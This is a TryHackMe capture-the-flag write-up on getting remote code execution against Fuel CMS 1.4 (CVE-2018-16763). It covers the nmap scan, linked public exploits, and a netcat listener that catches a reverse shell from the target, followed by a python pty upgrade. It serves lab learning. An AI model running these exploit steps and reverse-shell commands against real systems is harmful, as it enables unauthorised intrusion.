TryHackMe - Vulnerability Capstone
Just fix your exploits
Introduction
A bit frustrating room because we had to go through multiple non-working exploits but we managed to find a good one at the end.
Questions
What is the name of the application running on the vulnerable machine?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -T4 -n -sC -sV -Pn -p- 10.10.159.5
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9a:5b:14:49:04:b1:d5:44:82:6b:85:b0:f1:b8:1f:69 (RSA)
| 256 6f:4f:08:60:6d:46:a7:b8:e3:0e:1b:00:12:4b:e3:09 (ECDSA)
|_ 256 49:3c:2d:13:e7:8b:77:70:47:e4:f4:e1:df:96:5d:7a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Open ports:
22/tcp
80/tcp
Answer:
1
Fuel CMS
What is the version number of this application?
Answer:
1
1.4
What is the number of the CVE that allows an attacker to remotely execute code on this application?
Quick google search we can find the following https://pentest-tools.com/vulnerabilities-exploits/fuel-cms-141-remote-code-execution_2612
Answer:
1
CVE-2018-16763
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
Let’s get into it.
Download the exploit from https://www.exploit-db.com/exploits/50477 and let’s use it
1
2
3
4
5
6
7
8
9
10
11
12
python3 50477.py
usage: python3 50477.py -u <url>
python3 50477.py -u http://10.10.159.5
[+]Connecting...
Enter Command $ls
system
Enter Command $id
system
Enter Command $whoami
system
No matter what we type, the response is the same
Ok let’s download https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE, seems to be using the same CVE but a different approach
1
git clone https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE
This doesn’t seem to be working well aswell…
Flag
Ok finally exploit that is working https://gist.github.com/anir0y/8529960c18e212948b0e40ed1fb18d6d#file-fuel-cms-py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ python3 exploit.py 10.10.159.5/
______ _ _____ ___ ___ _____
| ___| | / __ \| \/ |/ ___|
| |_ _ _ ___| | / \/| . . |\ `--.
| _| | | |/ _ \ | | | |\/| | `--. \
| | | |_| | __/ | \__/\| | | |/\__/ /
\_| \__,_|\___|_|\____/\_| |_/\____/
Tested on 1.4
Created by Ac1d
Menu
exit - Exit app
shell_me - Get a reverse shell (netcat)
help - Show this help
fuelCMS$
We start our netcat listener on our attacker machine
1
nc -lvnp 1337
And let the exploit shell to ourselves
1
2
fuelCMS$ shell_me
Enter your attacking machine IP:PORT $ 10.14.99.72:1337
And we receive our shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.14.99.72] from (UNKNOWN) [10.10.159.5] 44904
/bin/sh: 0: can't access tty; job control turned off
$ ls
README.md
assets
composer.json
contributing.md
fuel
index.php
robots.txt
$ whoami
www-data
Just change to interactive shell and get our flag
1
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
